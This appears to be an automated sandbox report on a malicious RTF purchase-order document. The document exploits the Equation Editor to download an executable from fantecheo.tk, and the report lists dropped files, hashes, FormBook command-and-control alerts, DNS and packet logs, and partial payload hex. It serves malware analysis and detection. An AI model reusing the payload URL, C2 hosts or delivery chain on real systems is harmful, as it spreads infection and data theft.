                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.Ra..............0..|............... ........@.. ....................................@.................................4...O.......L............................................................................ ............... ..H............text....{... ...|.................. ..`.rsrc...L............~..............@..@.reloc..............................@..B................h.......H.......p...4.............................................................{....*:.(......}....*..0..$........u......,.(.....{.....{....o ...+..*v i.yE )UU.Z(.....{....o!...X*...0..M........r...p......%..{.....................-.q.............-.&.+.......o"....(#...*....0...........~......a ...._...da.+..*....0............{.....+..*&...}....*...0..............(.....+..*...0..?......... ...._....c.....{....(....}.......{....(....}.....{....f.+..*..0..X...........o$.......+6...Y.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{944DEEB7-0445-4A5E-BEFC-7294BB0C5BA3}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):13312
                                                    Entropy (8bit):3.5180602819243387
                                                    Encrypted:false
                                                    SSDEEP:384:L5J4SoLBBtlzYZuF8mDo+RvaWi2P27MPPFA7hZ:LTWBzF8P+RPAMXkhZ
                                                    MD5:EF344FD5E2E1BB5FDE6D53C482442333
                                                    SHA1:8C68B189186A18A3C8E8F5632C6F023E2D6108B3
                                                    SHA-256:FB361537266D06F762642B0C32139E14C2A8A5E6D88915B64691322F17E65CAF
                                                    SHA-512:6180A78765E94FF8978E60661155CBBDE6BE113BDBE51854C05FABA1E428FFAA0E4405A45C3BBC9505330383B19BFA6B6B75804E52FB1EA26C2AE9DF0A253F30
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: %.[.4.&.6.).3.?.4.1./.;.?.-.-.4.].?.>.?._.8.`.?.`.*.7.$.?./...7.[.=.[.=.../...4.%.9.~.~.'.4.7.*.1.,.~.:.0.'.|.?.].[.0.-...?.'.2.?.?.*.).?.0.`.9.=.%.^.'.|._...~.[.|.]._.?.@.?.?.?.*.].`.@.1.4.`.#.].*.+.=.!.3.?...4.?.(.|.,.?.?.7.0.?.<.^.6.%...%.%.7.2.5.`.4.|.9./.<.9.:.?.&.;.|.+.'.?.<.).4.'...~.].@.%.[.,.).+.|.?.6.5.>.?.7.!.0.].(.;.>.#.(.=.^.|.&.?.2.$.6.1.(.=.6.;.9.^.?.!.9.:...=.%.0.6.#.?.#.;.|.<.?...?.2.|./.;.?.8.1.#.'.%.<.,.|.~.....3.].:.?.].`.^.*.|.&.>._...6.*.`.|.(./.[.6.].?...0.(...5.1.~.=.-..._.[.%.<.0.?.-.!.6.%.-.).?.?.&.3.+.@.%.-.,...;.^.?.=.].2.'.1.0.1.=.>.1...?.%./.;.`.-.4.1._.?.:.?.3.^./.^.).>.2.>.1.=.3.].(.^.'.=...;.1.-.?.%.;.3.,.#.<.1./.#./.).<.8.6...8._.,.`.8.&.9.%.-.-...6.1.].`.?.9.@.?...(.?...;.[.$.-.$.%.?.~.(.'.?.=.%.]._.*.<.@.?.=.).?.?.@.-.$.[.....'._.!.7.......7.2.*.%.?.?.3.?.|.0.,./.$.3.@.8.`.7.~.#.,.[.#.?.:.%./.%...?.*.=.1._.....(.%.8.2.0.-.5.>.?.~.&.!.?.2._.@.0.!.1.[.[.$.,.;.+...2.4.).]...|.1.!.].2.0.?.>./.1.$.^.(.[.~.(.;.:.).&...?...7.#.,.4.9.?.,.8.6.?.0.?.6...0.|.`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F37BA74A-2884-4D29-90C1-0C63AEE1F3DB}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Sep 29 02:42:18 2021, length=19661, window=hide
                                                    Category:dropped
                                                    Size (bytes):1936
                                                    Entropy (8bit):4.478028575484341
                                                    Encrypted:false
                                                    SSDEEP:24:8NnUk/XTuzLI8hvDevQiDv3qRE/7Es2NnUk/XTuzLI8hvDevQiDv3qRE/7Eg:8Gk/XTkrFIaRWf2Gk/XTkrFIaRWB
                                                    MD5:249B619EB64074F7ACC92F26C11AC377
                                                    SHA1:8AAE07E6E2184BE746E4FB3EFC0AFF9D3E2477F7
                                                    SHA-256:4BA781EECD035514A0FB60DB92E641668DA36ACF24A7AD82A1F541E37306BD05
                                                    SHA-512:41C477D88E9BA235268482547AD81368FD02DE529EFF56F424B4857EB3751266121BEFE2C5F5F97748448BDCB27701A79B3B3C6B1265CB9B210014572C2CA872
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: L..................F.... ...9..?...9..?....}l.....L...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....P.2..L..=SJ. .PO.doc..:.......S ..S .*.........................P.O...d.o.c.......p...............-...8...[............?J......C:\Users\..#...................\\849224\Users.user\Desktop\PO.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......849224..........D_....3N...W...9..g............[D_....3N...W...9..g............[....L..................F.... ...9..?
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):44
                                                    Entropy (8bit):3.8399229603149925
                                                    Encrypted:false
                                                    SSDEEP:3:M1gAYCtc6YCmX1gAYCv:MiAYUc6Y6AYs
                                                    MD5:088B8C27544B9C39170C0441E31C3B1A
                                                    SHA1:05AD138F31421DEFB3C09831B6CFE977ABE372B8
                                                    SHA-256:C0953ABC66A9CA6017E4AF0644E9EE79209D64990513C518FDE3AAEE03F005EF
                                                    SHA-512:13EBB74599AA1310B975859AC05AF04B6004350266895E86E3A112559C315AD27950FCF1785B483BF2433CCBD9201DF8DAEF606E925EFECFC39B3D8967A212BE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: [doc]..PO.LNK=0..PO.LNK=0..[doc]..PO.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.503835550707526
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                    MD5:6462452E1083FFF3724A32DC01771E8B
                                                    SHA1:244116899824E727C5C399064F004C71D88F7254
                                                    SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                    SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):624640
                                                    Entropy (8bit):7.132231741936528
                                                    Encrypted:false
                                                    SSDEEP:12288:kzqzgNi+hBr7IUAYpHOSpUeR7/UbuxaWsbkUb+3tkvfY:kvNi+hBr8UAGFBVUbuoWsbkUmgfY
                                                    MD5:CE20BD8F40F78DA603DD17D756745B0A
                                                    SHA1:2538F96FAD951489CD9BB84F9B76B107EA70EAA5
                                                    SHA-256:680993E1220C8D918F192AE23C5C01B6357C58AD68B7CC59FA122C09B7B85CDD
                                                    SHA-512:8138F5FDC8CD0BD806E123CD86FCEB559E7BAFB631D6244F36A86934BE822E6A89CBB9010CBCE8A9A22F9F0F70511E7D0059DE4E8407B9641ECE96848DF5D5D2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                    Reputation:unknown
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.Ra..............0..|............... ........@.. ....................................@.................................4...O.......L............................................................................ ............... ..H............text....{... ...|.................. ..`.rsrc...L............~..............@..@.reloc..............................@..B................h.......H.......p...4.............................................................{....*:.(......}....*..0..$........u......,.(.....{.....{....o ...+..*v i.yE )UU.Z(.....{....o!...X*...0..M........r...p......%..{.....................-.q.............-.&.+.......o"....(#...*....0...........~......a ...._...da.+..*....0............{.....+..*&...}....*...0..............(.....+..*...0..?......... ...._....c.....{....(....}.......{....(....}.....{....f.+..*..0..X...........o$.......+6...Y.
                                                    C:\Users\user\Desktop\~$PO.doc
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.503835550707526
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                    MD5:6462452E1083FFF3724A32DC01771E8B
                                                    SHA1:244116899824E727C5C399064F004C71D88F7254
                                                    SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                    SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                    Malicious:true
                                                    Reputation:unknown
                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                    Static File Info

                                                    General

                                                    File type:Rich Text Format data, unknown version
                                                    Entropy (8bit):4.426499459410393
                                                    TrID:
                                                    • Rich Text Format (5005/1) 55.56%
                                                    • Rich Text Format (4004/1) 44.44%
                                                    File name:PO.doc
                                                    File size:19661
                                                    MD5:601260b52c23f2be80998a22b2fc77dd
                                                    SHA1:e4fd634040abd4f6b58aa7efe8fb59f7e64a395f
                                                    SHA256:2dfd64c86cfb81ed8a280b74e6e7b244a8a98d3788c8c552266ddd5327e4f055
                                                    SHA512:d8beacb0e01df26d41812d4152ff8afe46c25e620d200af0e9d6a27b6f89cd4dc915d77ca2f4f3e04dc78ff43192a4d5b5e52674eef4a000a0cc35dc4ef0df22
                                                    SSDEEP:384:Ac8lCXedYICEJZv+c3zvYcK1CJ+8sgl+0nmhWnPo9lMVEdVACzl9Q2qmNj7aJ52E:AvcXe2ILvZ3tKtbvWbV1MQfEE
                                                    File Content Preview:{\rtf9511%[4&6)3?41/;?--4]?>?_8`?`*7$?/.7[=[=./.4%9~~'47*1,~:0'|?][0-.?'2??*)?0`9=%^'|_.~[|]_?@???*]`@14`#]*+=!3?.4?(|,??70?<^6%.%%725`4|9/<9:?&;|+'?<)4'.~]@%[,)+|?65>?7!0](;>#(=^|&?2$61(=6;9^?!9:.=%06#?#;|<?.?2|/;?81#'%<,|~..3]:?]`^*|&>_.6*`|(/[6]?.0(.51

                                                    File Icon

                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                    Static RTF Info

                                                    Objects

                                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                    000001860hno
                                                    100001836h2embeddedequatiON.32142no

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    09/28/21-20:44:09.686778TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.2299.83.154.118
                                                    09/28/21-20:44:09.686778TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.2299.83.154.118
                                                    09/28/21-20:44:09.686778TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.2299.83.154.118
                                                    09/28/21-20:44:09.848998TCP1201ATTACK-RESPONSES 403 Forbidden804916699.83.154.118192.168.2.22

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 28, 2021 20:42:28.754209042 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.780873060 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.780987024 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.781491041 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.808105946 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809154034 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809184074 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809206009 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809228897 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809257030 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809289932 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809351921 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809380054 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809402943 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809406042 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809427977 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809437037 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809469938 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809604883 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809627056 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809653997 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809683084 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.822540998 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836040020 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836074114 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836096048 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836121082 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836143017 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836143970 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836167097 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836169004 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836193085 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836193085 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836214066 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836225033 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836246014 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836246014 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836265087 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836282969 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836302042 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836344004 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836378098 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836396933 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836453915 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836464882 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836473942 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836606979 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836702108 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836721897 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836738110 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836755991 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836785078 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836817980 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.838309050 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863256931 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863292933 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863317966 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863341093 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863363981 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863387108 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863408089 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863434076 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863518000 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863886118 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863925934 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863939047 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863950968 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863954067 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863970041 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863974094 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863981962 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863991976 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864010096 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864025116 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864039898 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864061117 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864084959 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864089012 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864101887 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864123106 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864142895 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864147902 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864159107 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864162922 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864180088 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864181995 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864198923 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864206076 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864219904 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864237070 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864317894 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864340067 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864366055 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864376068 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864382982 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864398003 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864423037 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864438057 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864521027 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864567041 CEST4916580192.168.2.22185.239.243.112

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 28, 2021 20:42:28.710421085 CEST5216753192.168.2.228.8.8.8
                                                    Sep 28, 2021 20:42:28.729835987 CEST53521678.8.8.8192.168.2.22
                                                    Sep 28, 2021 20:44:09.606345892 CEST5059153192.168.2.228.8.8.8
                                                    Sep 28, 2021 20:44:09.656146049 CEST53505918.8.8.8192.168.2.22
                                                    Sep 28, 2021 20:44:30.389796972 CEST5780553192.168.2.228.8.8.8
                                                    Sep 28, 2021 20:44:30.410459995 CEST53578058.8.8.8192.168.2.22

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Sep 28, 2021 20:42:28.710421085 CEST192.168.2.228.8.8.80x8cf9Standard query (0)fantecheo.tkA (IP address)IN (0x0001)
                                                    Sep 28, 2021 20:44:09.606345892 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.personowner.guruA (IP address)IN (0x0001)
                                                    Sep 28, 2021 20:44:30.389796972 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.audiofactaesthetic.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Sep 28, 2021 20:42:28.729835987 CEST8.8.8.8192.168.2.220x8cf9No error (0)fantecheo.tk185.239.243.112A (IP address)IN (0x0001)
                                                    Sep 28, 2021 20:44:09.656146049 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.personowner.guru99.83.154.118A (IP address)IN (0x0001)
                                                    Sep 28, 2021 20:44:30.410459995 CEST8.8.8.8192.168.2.220xfc43No error (0)www.audiofactaesthetic.com63.250.43.8A (IP address)IN (0x0001)
                                                    Sep 28, 2021 20:44:30.410459995 CEST8.8.8.8192.168.2.220xfc43No error (0)www.audiofactaesthetic.com63.250.43.7A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • fantecheo.tk
                                                    • www.personowner.guru
                                                    • www.audiofactaesthetic.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.2249165185.239.243.11280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 28, 2021 20:42:28.781491041 CEST0OUTGET /ibefrankszx.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: fantecheo.tk
                                                    Connection: Keep-Alive
                                                    Sep 28, 2021 20:42:28.809154034 CEST2INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Tue, 28 Sep 2021 18:42:28 GMT
                                                    Content-Type: application/x-msdownload
                                                    Content-Length: 624640
                                                    Last-Modified: Tue, 28 Sep 2021 03:45:00 GMT
                                                    Connection: keep-alive
                                                    ETag: "61528fbc-98800"
                                                    Accept-Ranges: bytes
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 85 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 7c 09 00 00 0a 00 00 00 00 00 00 86 97 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 97 09 00 4f 00 00 00 00 a0 09 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 7b 09 00 00 20 00 00 00 7c 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 4c 06 00 00 00 a0 09 00 00 08 00 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 86 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 97 09 00 00 00 00 00 48 00 00 00 02 00 05 00 70 f6 00 00 34 00 03 00 03 00 00 00 a3 01 00 06 a4 f6 03 00 90 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 1d 00 00 0a 2a 3a 02 28 1e 00 00 0a 02 03 7d 1d 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 02 00 00 1b 0a 06 2c 18 28 1f 00 00 0a 02 7b 1d 00 00 0a 06 7b 1d 00 00 0a 6f 20 00 00 0a 2b 01 16 2a 76 20 69 1f 79 45 20 29 55 55 a5 5a 28 1f 00 00 0a 02 7b 1d 00 00 0a 6f 21 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 13 00 00 01 25 16 02 7b 1d 00 00 0a 0a 12 00 12 01 fe 15 04 00 00 1b 07 8c 04 00 00 1b 2d 14 71 04 00 00 1b 0b 12 01 07 8c 04 00 00 1b 2d 04 26 14 2b 0b fe 16 04 00 00 1b 6f 22 00 00 0a a2 28 23 00 00 0a 2a 00 00 00 13 30 03 00 19 00 00 00 03 00 00 11 00 7e 03 00 00 04 03 02 61 20 ff 00 00 00 5f 95 03 1e 64 61 0a 2b 00 06 2a 00 00 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 02 7b 02 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 02 00 00 04 2a 00 00 13 30 02 00 0e 00 00 00 03 00 00 11 00 02 03 d1 28 0a 00 00 06 0a 2b 00 06 2a 00 00 13 30 03 00 3f 00 00 00 04 00 00 11 00 03 20 ff 00 00 00 5f d2 0a 03 1e 63 